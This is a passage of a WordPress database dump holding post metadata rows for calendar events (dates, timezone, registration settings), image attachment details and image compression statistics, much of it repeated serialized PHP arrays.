23,'protect_children',''),(133291,263923,'protect_children',''),(133292,263923,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614244290;s:12:\"_EventOrigin\";i:1614244290;s:13:\"_thumbnail_id\";i:1614244873;s:24:\"boldgrid_hide_page_title\";i:1614244290;s:17:\"_EventShowMapLink\";i:1614244290;s:13:\"_EventShowMap\";i:1614244290;s:15:\"_EventStartDate\";i:1614244873;s:13:\"_EventEndDate\";i:1614244873;s:18:\"_EventStartDateUTC\";i:1614244873;s:16:\"_EventEndDateUTC\";i:1614244873;s:14:\"_EventDuration\";i:1614244290;s:20:\"_EventCurrencySymbol\";i:1614244290;s:22:\"_EventCurrencyPosition\";i:1614244290;s:10:\"_EventCost\";i:1614244290;s:9:\"_EventURL\";i:1614244290;s:14:\"_EventTimezone\";i:1614244290;s:18:\"_EventTimezoneAbbr\";i:1614244290;s:27:\"_EventNextPendingRecurrence\";i:1614244290;s:26:\"_RTECregistrationsDisabled\";i:1614244290;s:17:\"_RTECdeadlineType\";i:1614244290;s:19:\"_RTECwhoCanRegister\";i:1614244290;s:23:\"_RTEClimitRegistrations\";i:1614244290;s:21:\"_RTECmaxRegistrations\";i:1614244290;s:16:\"_EventRecurrence\";i:1614244290;s:18:\"_RTECnumRegistered\";i:1614244290;s:13:\"_EventVenueID\";i:1614244290;s:12:\"_dp_original\";i:1614244290;s:10:\"_edit_last\";i:1614244368;s:10:\"post_title\";i:1614244368;s:12:\"post_content\";i:1614245808;s:16:\"tribe_events_cat\";i:1614271008;s:11:\"post_status\";i:1614244873;}'),(133324,263923,'_EventCurrencyPosition','prefix'),(133293,263923,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614244290;s:12:\"_EventOrigin\";i:1614244290;s:13:\"_thumbnail_id\";i:1614244873;s:24:\"boldgrid_hide_page_title\";i:1614244290;s:17:\"_EventShowMapLink\";i:1614244290;s:13:\"_EventShowMap\";i:1614244290;s:15:\"_EventStartDate\";i:1614244873;s:13:\"_EventEndDate\";i:1614244873;s:18:\"_EventStartDateUTC\";i:1614244873;s:16:\"_EventEndDateUTC\";i:1614244873;s:14:\"_EventDuration\";i:1614244290;s:20:\"_EventCurrencySymbol\";i:1614244290;s:22:\"_EventCurrencyPosition\";i:1614244290;s:10:\"_EventCost\";i:1614244290;s:9:\"_EventURL\";i:1614244290;s:14:\"_EventTimezone\";i:1614244290;s:18:\"_EventTimezoneAbbr\";i:1614244290;s:27:\"_EventNextPendingRecurrence\";i:1614244290;s:26:\"_RTECregistrationsDisabled\";i:1614244290;s:17:\"_RTECdeadlineType\";i:1614244290;s:19:\"_RTECwhoCanRegister\";i:1614244290;s:23:\"_RTEClimitRegistrations\";i:1614244290;s:21:\"_RTECmaxRegistrations\";i:1614244290;s:16:\"_EventRecurrence\";i:1614244290;s:18:\"_RTECnumRegistered\";i:1614244290;s:13:\"_EventVenueID\";i:1614244290;s:12:\"_dp_original\";i:1614244290;s:10:\"_edit_last\";i:1614244368;s:10:\"post_title\";i:1614244368;s:12:\"post_content\";i:1614245808;s:16:\"tribe_events_cat\";i:1614271008;s:11:\"post_status\";i:1614244873;}'),(133323,263923,'_EventCurrencySymbol',''),(133294,263923,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614244290;s:12:\"_EventOrigin\";i:1614244290;s:13:\"_thumbnail_id\";i:1614244873;s:24:\"boldgrid_hide_page_title\";i:1614244290;s:17:\"_EventShowMapLink\";i:1614244290;s:13:\"_EventShowMap\";i:1614244290;s:15:\"_EventStartDate\";i:1614244873;s:13:\"_EventEndDate\";i:1614244873;s:18:\"_EventStartDateUTC\";i:1614244873;s:16:\"_EventEndDateUTC\";i:1614244873;s:14:\"_EventDuration\";i:1614244290;s:20:\"_EventCurrencySymbol\";i:1614244290;s:22:\"_EventCurrencyPosition\";i:1614244290;s:10:\"_EventCost\";i:1614244290;s:9:\"_EventURL\";i:1614244290;s:14:\"_EventTimezone\";i:1614244290;s:18:\"_EventTimezoneAbbr\";i:1614244290;s:27:\"_EventNextPendingRecurrence\";i:1614244290;s:26:\"_RTECregistrationsDisabled\";i:1614244290;s:17:\"_RTECdeadlineType\";i:1614244290;s:19:\"_RTECwhoCanRegister\";i:1614244290;s:23:\"_RTEClimitRegistrations\";i:1614244290;s:21:\"_RTECmaxRegistrations\";i:1614244290;s:16:\"_EventRecurrence\";i:1614244290;s:18:\"_RTECnumRegistered\";i:1614244290;s:13:\"_EventVenueID\";i:1614244290;s:12:\"_dp_original\";i:1614244290;s:10:\"_edit_last\";i:1614244368;s:10:\"post_title\";i:1614244368;s:12:\"post_content\";i:1614245808;s:16:\"tribe_events_cat\";i:1614271008;s:11:\"post_status\";i:1614244873;}'),(133322,263923,'_EventDuration','3600'),(133325,263923,'_EventCost',''),(133295,263923,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614244290;s:12:\"_EventOrigin\";i:1614244290;s:13:\"_thumbnail_id\";i:1614244873;s:24:\"boldgrid_hide_page_title\";i:1614244290;s:17:\"_EventShowMapLink\";i:1614244290;s:13:\"_EventShowMap\";i:1614244290;s:15:\"_EventStartDate\";i:1614244873;s:13:\"_EventEndDate\";i:1614244873;s:18:\"_EventStartDateUTC\";i:1614244873;s:16:\"_EventEndDateUTC\";i:1614244873;s:14:\"_EventDuration\";i:1614244290;s:20:\"_EventCurrencySymbol\";i:1614244290;s:22:\"_EventCurrencyPosition\";i:1614244290;s:10:\"_EventCost\";i:1614244290;s:9:\"_EventURL\";i:1614244290;s:14:\"_EventTimezone\";i:1614244290;s:18:\"_EventTimezoneAbbr\";i:1614244290;s:27:\"_EventNextPendingRecurrence\";i:1614244290;s:26:\"_RTECregistrationsDisabled\";i:1614244290;s:17:\"_RTECdeadlineType\";i:1614244290;s:19:\"_RTECwhoCanRegister\";i:1614244290;s:23:\"_RTEClimitRegistrations\";i:1614244290;s:21:\"_RTECmaxRegistrations\";i:1614244290;s:16:\"_EventRecurrence\";i:1614244290;s:18:\"_RTECnumRegistered\";i:1614244290;s:13:\"_EventVenueID\";i:1614244290;s:12:\"_dp_original\";i:1614244290;s:10:\"_edit_last\";i:1614244368;s:10:\"post_title\";i:1614244368;s:12:\"post_content\";i:1614245808;s:16:\"tribe_events_cat\";i:1614271008;s:11:\"post_status\";i:1614244873;}'),(133321,263923,'_EventEndDateUTC','2021-03-08 23:00:00'),(133296,263923,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614244290;s:12:\"_EventOrigin\";i:1614244290;s:13:\"_thumbnail_id\";i:1614244873;s:24:\"boldgrid_hide_page_title\";i:1614244290;s:17:\"_EventShowMapLink\";i:1614244290;s:13:\"_EventShowMap\";i:1614244290;s:15:\"_EventStartDate\";i:1614244873;s:13:\"_EventEndDate\";i:1614244873;s:18:\"_EventStartDateUTC\";i:1614244873;s:16:\"_EventEndDateUTC\";i:1614244873;s:14:\"_EventDuration\";i:1614244290;s:20:\"_EventCurrencySymbol\";i:1614244290;s:22:\"_EventCurrencyPosition\";i:1614244290;s:10:\"_EventCost\";i:1614244290;s:9:\"_EventURL\";i:1614244290;s:14:\"_EventTimezone\";i:1614244290;s:18:\"_EventTimezoneAbbr\";i:1614244290;s:27:\"_EventNextPendingRecurrence\";i:1614244290;s:26:\"_RTECregistrationsDisabled\";i:1614244290;s:17:\"_RTECdeadlineType\";i:1614244290;s:19:\"_RTECwhoCanRegister\";i:1614244290;s:23:\"_RTEClimitRegistrations\";i:1614244290;s:21:\"_RTECmaxRegistrations\";i:1614244290;s:16:\"_EventRecurrence\";i:1614244290;s:18:\"_RTECnumRegistered\";i:1614244290;s:13:\"_EventVenueID\";i:1614244290;s:12:\"_dp_original\";i:1614244290;s:10:\"_edit_last\";i:1614244368;s:10:\"post_title\";i:1614244368;s:12:\"post_content\";i:1614245808;s:16:\"tribe_events_cat\";i:1614271008;s:11:\"post_status\";i:1614244873;}'),(133320,263923,'_EventStartDateUTC','2021-03-08 22:00:00'),(133326,263923,'_EventURL',''),(133297,263923,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614244290;s:12:\"_EventOrigin\";i:1614244290;s:13:\"_thumbnail_id\";i:1614244873;s:24:\"boldgrid_hide_page_title\";i:1614244290;s:17:\"_EventShowMapLink\";i:1614244290;s:13:\"_EventShowMap\";i:1614244290;s:15:\"_EventStartDate\";i:1614244873;s:13:\"_EventEndDate\";i:1614244873;s:18:\"_EventStartDateUTC\";i:1614244873;s:16:\"_EventEndDateUTC\";i:1614244873;s:14:\"_EventDuration\";i:1614244290;s:20:\"_EventCurrencySymbol\";i:1614244290;s:22:\"_EventCurrencyPosition\";i:1614244290;s:10:\"_EventCost\";i:1614244290;s:9:\"_EventURL\";i:1614244290;s:14:\"_EventTimezone\";i:1614244290;s:18:\"_EventTimezoneAbbr\";i:1614244290;s:27:\"_EventNextPendingRecurrence\";i:1614244290;s:26:\"_RTECregistrationsDisabled\";i:1614244290;s:17:\"_RTECdeadlineType\";i:1614244290;s:19:\"_RTECwhoCanRegister\";i:1614244290;s:23:\"_RTEClimitRegistrations\";i:1614244290;s:21:\"_RTECmaxRegistrations\";i:1614244290;s:16:\"_EventRecurrence\";i:1614244290;s:18:\"_RTECnumRegistered\";i:1614244290;s:13:\"_EventVenueID\";i:1614244290;s:12:\"_dp_original\";i:1614244290;s:10:\"_edit_last\";i:1614244368;s:10:\"post_title\";i:1614244368;s:12:\"post_content\";i:1614245808;s:16:\"tribe_events_cat\";i:1614271008;s:11:\"post_status\";i:1614244873;}'),(133319,263923,'_EventEndDate','2021-03-08 16:00:00'),(133327,263923,'_EventTimezone','America/Denver'),(133298,263923,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614244290;s:12:\"_EventOrigin\";i:1614244290;s:13:\"_thumbnail_id\";i:1614244873;s:24:\"boldgrid_hide_page_title\";i:1614244290;s:17:\"_EventShowMapLink\";i:1614244290;s:13:\"_EventShowMap\";i:1614244290;s:15:\"_EventStartDate\";i:1614244873;s:13:\"_EventEndDate\";i:1614244873;s:18:\"_EventStartDateUTC\";i:1614244873;s:16:\"_EventEndDateUTC\";i:1614244873;s:14:\"_EventDuration\";i:1614244290;s:20:\"_EventCurrencySymbol\";i:1614244290;s:22:\"_EventCurrencyPosition\";i:1614244290;s:10:\"_EventCost\";i:1614244290;s:9:\"_EventURL\";i:1614244290;s:14:\"_EventTimezone\";i:1614244290;s:18:\"_EventTimezoneAbbr\";i:1614244290;s:27:\"_EventNextPendingRecurrence\";i:1614244290;s:26:\"_RTECregistrationsDisabled\";i:1614244290;s:17:\"_RTECdeadlineType\";i:1614244290;s:19:\"_RTECwhoCanRegister\";i:1614244290;s:23:\"_RTEClimitRegistrations\";i:1614244290;s:21:\"_RTECmaxRegistrations\";i:1614244290;s:16:\"_EventRecurrence\";i:1614244290;s:18:\"_RTECnumRegistered\";i:1614244290;s:13:\"_EventVenueID\";i:1614244290;s:12:\"_dp_original\";i:1614244290;s:10:\"_edit_last\";i:1614244368;s:10:\"post_title\";i:1614244368;s:12:\"post_content\";i:1614245808;s:16:\"tribe_events_cat\";i:1614271008;s:11:\"post_status\";i:1614244873;}'),(133318,263923,'_EventStartDate','2021-03-08 15:00:00'),(133328,263923,'_EventTimezoneAbbr','MST'),(133299,263923,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614244290;s:12:\"_EventOrigin\";i:1614244290;s:13:\"_thumbnail_id\";i:1614244873;s:24:\"boldgrid_hide_page_title\";i:1614244290;s:17:\"_EventShowMapLink\";i:1614244290;s:13:\"_EventShowMap\";i:1614244290;s:15:\"_EventStartDate\";i:1614244873;s:13:\"_EventEndDate\";i:1614244873;s:18:\"_EventStartDateUTC\";i:1614244873;s:16:\"_EventEndDateUTC\";i:1614244873;s:14:\"_EventDuration\";i:1614244290;s:20:\"_EventCurrencySymbol\";i:1614244290;s:22:\"_EventCurrencyPosition\";i:1614244290;s:10:\"_EventCost\";i:1614244290;s:9:\"_EventURL\";i:1614244290;s:14:\"_EventTimezone\";i:1614244290;s:18:\"_EventTimezoneAbbr\";i:1614244290;s:27:\"_EventNextPendingRecurrence\";i:1614244290;s:26:\"_RTECregistrationsDisabled\";i:1614244290;s:17:\"_RTECdeadlineType\";i:1614244290;s:19:\"_RTECwhoCanRegister\";i:1614244290;s:23:\"_RTEClimitRegistrations\";i:1614244290;s:21:\"_RTECmaxRegistrations\";i:1614244290;s:16:\"_EventRecurrence\";i:1614244290;s:18:\"_RTECnumRegistered\";i:1614244290;s:13:\"_EventVenueID\";i:1614244290;s:12:\"_dp_original\";i:1614244290;s:10:\"_edit_last\";i:1614244368;s:10:\"post_title\";i:1614244368;s:12:\"post_content\";i:1614245808;s:16:\"tribe_events_cat\";i:1614271008;s:11:\"post_status\";i:1614244873;}'),(133317,263923,'_EventShowMap',''),(133329,263923,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(133300,263923,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614244290;s:12:\"_EventOrigin\";i:1614244290;s:13:\"_thumbnail_id\";i:1614244873;s:24:\"boldgrid_hide_page_title\";i:1614244290;s:17:\"_EventShowMapLink\";i:1614244290;s:13:\"_EventShowMap\";i:1614244290;s:15:\"_EventStartDate\";i:1614244873;s:13:\"_EventEndDate\";i:1614244873;s:18:\"_EventStartDateUTC\";i:1614244873;s:16:\"_EventEndDateUTC\";i:1614244873;s:14:\"_EventDuration\";i:1614244290;s:20:\"_EventCurrencySymbol\";i:1614244290;s:22:\"_EventCurrencyPosition\";i:1614244290;s:10:\"_EventCost\";i:1614244290;s:9:\"_EventURL\";i:1614244290;s:14:\"_EventTimezone\";i:1614244290;s:18:\"_EventTimezoneAbbr\";i:1614244290;s:27:\"_EventNextPendingRecurrence\";i:1614244290;s:26:\"_RTECregistrationsDisabled\";i:1614244290;s:17:\"_RTECdeadlineType\";i:1614244290;s:19:\"_RTECwhoCanRegister\";i:1614244290;s:23:\"_RTEClimitRegistrations\";i:1614244290;s:21:\"_RTECmaxRegistrations\";i:1614244290;s:16:\"_EventRecurrence\";i:1614244290;s:18:\"_RTECnumRegistered\";i:1614244290;s:13:\"_EventVenueID\";i:1614244290;s:12:\"_dp_original\";i:1614244290;s:10:\"_edit_last\";i:1614244368;s:10:\"post_title\";i:1614244368;s:12:\"post_content\";i:1614245808;s:16:\"tribe_events_cat\";i:1614271008;s:11:\"post_status\";i:1614244873;}'),(133316,263923,'_EventShowMapLink',''),(133330,263923,'_RTECregistrationsDisabled','1'),(133331,263923,'_RTECdeadlineType','start'),(133301,263923,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614244290;s:12:\"_EventOrigin\";i:1614244290;s:13:\"_thumbnail_id\";i:1614244873;s:24:\"boldgrid_hide_page_title\";i:1614244290;s:17:\"_EventShowMapLink\";i:1614244290;s:13:\"_EventShowMap\";i:1614244290;s:15:\"_EventStartDate\";i:1614244873;s:13:\"_EventEndDate\";i:1614244873;s:18:\"_EventStartDateUTC\";i:1614244873;s:16:\"_EventEndDateUTC\";i:1614244873;s:14:\"_EventDuration\";i:1614244290;s:20:\"_EventCurrencySymbol\";i:1614244290;s:22:\"_EventCurrencyPosition\";i:1614244290;s:10:\"_EventCost\";i:1614244290;s:9:\"_EventURL\";i:1614244290;s:14:\"_EventTimezone\";i:1614244290;s:18:\"_EventTimezoneAbbr\";i:1614244290;s:27:\"_EventNextPendingRecurrence\";i:1614244290;s:26:\"_RTECregistrationsDisabled\";i:1614244290;s:17:\"_RTECdeadlineType\";i:1614244290;s:19:\"_RTECwhoCanRegister\";i:1614244290;s:23:\"_RTEClimitRegistrations\";i:1614244290;s:21:\"_RTECmaxRegistrations\";i:1614244290;s:16:\"_EventRecurrence\";i:1614244290;s:18:\"_RTECnumRegistered\";i:1614244290;s:13:\"_EventVenueID\";i:1614244290;s:12:\"_dp_original\";i:1614244290;s:10:\"_edit_last\";i:1614244368;s:10:\"post_title\";i:1614244368;s:12:\"post_content\";i:1614245808;s:16:\"tribe_events_cat\";i:1614271008;s:11:\"post_status\";i:1614244873;}'),(133315,263923,'boldgrid_hide_page_title','0'),(133332,263923,'_RTECwhoCanRegister','any'),(133302,263923,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614244290;s:12:\"_EventOrigin\";i:1614244290;s:13:\"_thumbnail_id\";i:1614244873;s:24:\"boldgrid_hide_page_title\";i:1614244290;s:17:\"_EventShowMapLink\";i:1614244290;s:13:\"_EventShowMap\";i:1614244290;s:15:\"_EventStartDate\";i:1614244873;s:13:\"_EventEndDate\";i:1614244873;s:18:\"_EventStartDateUTC\";i:1614244873;s:16:\"_EventEndDateUTC\";i:1614244873;s:14:\"_EventDuration\";i:1614244290;s:20:\"_EventCurrencySymbol\";i:1614244290;s:22:\"_EventCurrencyPosition\";i:1614244290;s:10:\"_EventCost\";i:1614244290;s:9:\"_EventURL\";i:1614244290;s:14:\"_EventTimezone\";i:1614244290;s:18:\"_EventTimezoneAbbr\";i:1614244290;s:27:\"_EventNextPendingRecurrence\";i:1614244290;s:26:\"_RTECregistrationsDisabled\";i:1614244290;s:17:\"_RTECdeadlineType\";i:1614244290;s:19:\"_RTECwhoCanRegister\";i:1614244290;s:23:\"_RTEClimitRegistrations\";i:1614244290;s:21:\"_RTECmaxRegistrations\";i:1614244290;s:16:\"_EventRecurrence\";i:1614244290;s:18:\"_RTECnumRegistered\";i:1614244290;s:13:\"_EventVenueID\";i:1614244290;s:12:\"_dp_original\";i:1614244290;s:10:\"_edit_last\";i:1614244368;s:10:\"post_title\";i:1614244368;s:12:\"post_content\";i:1614245808;s:16:\"tribe_events_cat\";i:1614271008;s:11:\"post_status\";i:1614244873;}'),(133304,263923,'_EventOrigin','events-calendar'),(133305,263923,'_EventOrigin','events-calendar'),(133306,263923,'_EventOrigin','events-calendar'),(133307,263923,'_EventOrigin','events-calendar'),(133308,263923,'_EventOrigin','events-calendar'),(133309,263923,'_EventOrigin','events-calendar'),(133310,263923,'_EventOrigin','events-calendar'),(133311,263923,'_EventOrigin','events-calendar'),(133312,263923,'_EventOrigin','events-calendar'),(133313,263923,'_EventOrigin','events-calendar'),(133314,263923,'_thumbnail_id','263924'),(133303,263923,'_EventOrigin','events-calendar'),(133333,263923,'_RTEClimitRegistrations','0'),(133334,263923,'_RTECmaxRegistrations','30'),(133335,263923,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(133336,263923,'_RTECnumRegistered','0'),(133337,263923,'_EventVenueID','262435'),(133339,263923,'_dp_original','263641'),(133340,263923,'_edit_lock','1614270943:2'),(133341,263923,'_edit_last','2'),(133342,263924,'_wp_attached_file','2021/02/seeker-on-hill.jpg'),(133343,263924,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:472;s:6:\"height\";i:265;s:4:\"file\";s:26:\"2021/02/seeker-on-hill.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"seeker-on-hill-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"seeker-on-hill-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"seeker-on-hill-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(133370,263924,'original-file','2021/02/seeker-on-hill-updraft-pre-smush-original.jpg'),(133371,263924,'smush-complete','1'),(133372,263924,'smush-info','The file was compressed from 25.37 KB to 24.51 KB saving 3.4 percent using WP-Optimize'),(133373,263924,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:25977;s:12:\"smushed-size\";i:25095;s:15:\"savings-percent\";d:3.399999999999999911182158029987476766109466552734375;}'),(150989,265950,'original-file','2021/11/seminar-logo-2-updraft-pre-smush-original.png'),(150990,265950,'smush-complete','1'),(150991,265950,'smush-info','The file was compressed from 31.13 KB to 10.34 KB saving 66.78 percent using WP-Optimize'),(150992,265950,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:31872;s:12:\"smushed-size\";i:10588;s:15:\"savings-percent\";d:66.780000000000001136868377216160297393798828125;}'),(150987,265950,'_wp_attached_file','2021/11/seminar-logo-2.png'),(150988,265950,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:415;s:6:\"height\";i:138;s:4:\"file\";s:26:\"2021/11/seminar-logo-2.png\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"seminar-logo-2-300x100.png\";s:5:\"width\";i:300;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"seminar-logo-2-150x138.png\";s:5:\"width\";i:150;s:6:\"height\";i:138;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:26:\"seminar-logo-2-300x138.png\";s:5:\"width\";i:300;s:6:\"height\";i:138;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:26:\"seminar-logo-2-391x138.png\";s:5:\"width\";i:391;s:6:\"height\";i:138;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:26:\"seminar-logo-2-300x138.png\";s:5:\"width\";i:300;s:6:\"height\";i:138;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(150979,265947,'original-file','2021/11/podcast-logo-1-updraft-pre-smush-original.png'),(150980,265947,'smush-complete','1'),(150981,265947,'smush-info','The file was compressed from 38.44 KB to 12.01 KB saving 68.75 percent using WP-Optimize'),(150982,265947,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:39367;s:12:\"smushed-size\";i:12302;s:15:\"savings-percent\";d:68.75;}'),(133400,263930,'protect_children',''),(133401,263930,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1614245469;s:12:\"_EventOrigin\";i:1614245469;s:13:\"_thumbnail_id\";i:1614245470;s:24:\"boldgrid_hide_page_title\";i:1614245470;s:17:\"_EventShowMapLink\";i:1614245470;s:13:\"_EventShowMap\";i:1614245470;s:15:\"_EventStartDate\";i:1614245535;s:13:\"_EventEndDate\";i:1614245535;s:18:\"_EventStartDateUTC\";i:1614245535;s:16:\"_EventEndDateUTC\";i:1614245535;s:14:\"_EventDuration\";i:1614245470;s:20:\"_EventCurrencySymbol\";i:1614245470;s:22:\"_EventCurrencyPosition\";i:1614245470;s:10:\"_EventCost\";i:1614245470;s:9:\"_EventURL\";i:1614245470;s:14:\"_EventTimezone\";i:1614245470;s:18:\"_EventTimezoneAbbr\";i:1614245535;s:27:\"_EventNextPendingRecurrence\";i:1614245470;s:26:\"_RTECregistrationsDisabled\";i:1614245470;s:17:\"_RTECdeadlineType\";i:1614245470;s:19:\"_RTECwhoCanRegister\";i:1614245470;s:23:\"_RTEClimitRegistrations\";i:1614245470;s:21:\"_RTECmaxRegistrations\";i:1614245470;s:16:\"_EventRecurrence\";i:1614245470;s:18:\"_RTECnumRegistered\";i:1614245470;s:13:\"_EventVenueID\";i:1614245470;s:12:\"_dp_original\";i:1614245470;s:16:\"tribe_events_cat\";i:1614271171;s:10:\"_edit_last\";i:1614245535;s:11:\"post_status\";i:1614245535;s:12:\"post_content\";i:1614245971;}'),(133402,263930,'_EventOrigin','events-calendar'),(133403,263930,'protect_children',''),(133404,263930,'protect_children',''),(133405,263930,'protect_children',''),(133406,263930,'protect_children',''),(133407,263930,'protect_children',''),(133408,263930,'protect_children',''),(133409,263930,'protect_children',''),(133410,263930,'protect_children',''),(133411,263930,'protect_children',''),(133412,263930,'protect_children',''),(133413,263930,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1614245469;s:12:\"_EventOrigin\";i:1614245469;s:13:\"_thumbnail_id\";i:1614245470;s:24:\"boldgrid_hide_page_title\";i:1614245470;s:17:\"_EventShowMapLink\";i:1614245470;s:13:\"_EventShowMap\";i:1614245470;s:15:\"_EventStartDate\";i:1614245535;s:13:\"_EventEndDate\";i:1614245535;s:18:\"_EventStartDateUTC\";i:1614245535;s:16:\"_EventEndDateUTC\";i:1614245535;s:14:\"_EventDuration\";i:1614245470;s:20:\"_EventCurrencySymbol\";i:1614245470;s:22:\"_EventCurrencyPosition\";i:1614245470;s:10:\"_EventCost\";i:1614245470;s:9:\"_EventURL\";i:1614245470;s:14:\"_EventTimezone\";i:1614245470;s:18:\"_EventTimezoneAbbr\";i:1614245535;s:27:\"_EventNextPendingRecurrence\";i:1614245470;s:26:\"_RTECregistrationsDisabled\";i:1614245470;s:17:\"_RTECdeadlineType\";i:1614245470;s:19:\"_RTECwhoCanRegister\";i:1614245470;s:23:\"_RTEClimitRegistrations\";i:1614245470;s:21:\"_RTECmaxRegistrations\";i:1614245470;s:16:\"_EventRecurrence\";i:1614245470;s:18:\"_RTECnumRegistered\";i:1614245470;s:13:\"_EventVenueID\";i:1614245470;s:12:\"_dp_original\";i:1614245470;s:16:\"tribe_events_cat\";i:1614271171;s:10:\"_edit_last\";i:1614245535;s:11:\"post_status\";i:1614245535;s:12:\"post_content\";i:1614245971;}'),(133448,263930,'_EventCost',''),(133414,263930,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1614245469;s:12:\"_EventOrigin\";i:1614245469;s:13:\"_thumbnail_id\";i:1614245470;s:24:\"boldgrid_hide_page_title\";i:1614245470;s:17:\"_EventShowMapLink\";i:1614245470;s:13:\"_EventShowMap\";i:1614245470;s:15:\"_EventStartDate\";i:1614245535;s:13:\"_EventEndDate\";i:1614245535;s:18:\"_EventStartDateUTC\";i:1614245535;s:16:\"_EventEndDateUTC\";i:1614245535;s:14:\"_EventDuration\";i:1614245470;s:20:\"_EventCurrencySymbol\";i:1614245470;s:22:\"_EventCurrencyPosition\";i:1614245470;s:10:\"_EventCost\";i:1614245470;s:9:\"_EventURL\";i:1614245470;s:14:\"_EventTimezone\";i:1614245470;s:18:\"_EventTimezoneAbbr\";i:1614245535;s:27:\"_EventNextPendingRecurrence\";i:1614245470;s:26:\"_RTECregistrationsDisabled\";i:1614245470;s:17:\"_RTECdeadlineType\";i:1614245470;s:19:\"_RTECwhoCanRegister\";i:1614245470;s:23:\"_RTEClimitRegistrations\";i:1614245470;s:21:\"_RTECmaxRegistrations\";i:1614245470;s:16:\"_EventRecurrence\";i:1614245470;s:18:\"_RTECnumRegistered\";i:1614245470;s:13:\"_EventVenueID\";i:1614245470;s:12:\"_dp_original\";i:1614245470;s:16:\"tribe_events_cat\";i:1614271171;s:10:\"_edit_last\";i:1614245535;s:11:\"post_status\";i:1614245535;s:12:\"post_content\";i:1614245971;}'),(133447,263930,'_EventCurrencyPosition','prefix'),(133415,263930,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1614245469;s:12:\"_EventOrigin\";i:1614245469;s:13:\"_thumbnail_id\";i:1614245470;s:24:\"boldgrid_hide_page_title\";i:1614245470;s:17:\"_EventShowMapLink\";i:1614245470;s:13:\"_EventShowMap\";i:1614245470;s:15:\"_EventStartDate\";i:1614245535;s:13:\"_EventEndDate\";i:1614245535;s:18:\"_EventStartDateUTC\";i:1614245535;s:16:\"_EventEndDateUTC\";i:1614245535;s:14:\"_EventDuration\";i:1614245470;s:20:\"_EventCurrencySymbol\";i:1614245470;s:22:\"_EventCurrencyPosition\";i:1614245470;s:10:\"_EventCost\";i:1614245470;s:9:\"_EventURL\";i:1614245470;s:14:\"_EventTimezone\";i:1614245470;s:18:\"_EventTimezoneAbbr\";i:1614245535;s:27:\"_EventNextPendingRecurrence\";i:1614245470;s:26:\"_RTECregistrationsDisabled\";i:1614245470;s:17:\"_RTECdeadlineType\";i:1614245470;s:19:\"_RTECwhoCanRegister\";i:1614245470;s:23:\"_RTEClimitRegistrations\";i:1614245470;s:21:\"_RTECmaxRegistrations\";i:1614245470;s:16:\"_EventRecurrence\";i:1614245470;s:18:\"_RTECnumRegistered\";i:1614245470;s:13:\"_EventVenueID\";i:1614245470;s:12:\"_dp_original\";i:1614245470;s:16:\"tribe_events_cat\";i:1614271171;s:10:\"_edit_last\";i:1614245535;s:11:\"post_status\";i:1614245535;s:12:\"post_content\";i:1614245971;}'),(133446,263930,'_EventCurrencySymbol',''),(133449,263930,'_EventURL',''),(133416,263930,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1614245469;s:12:\"_EventO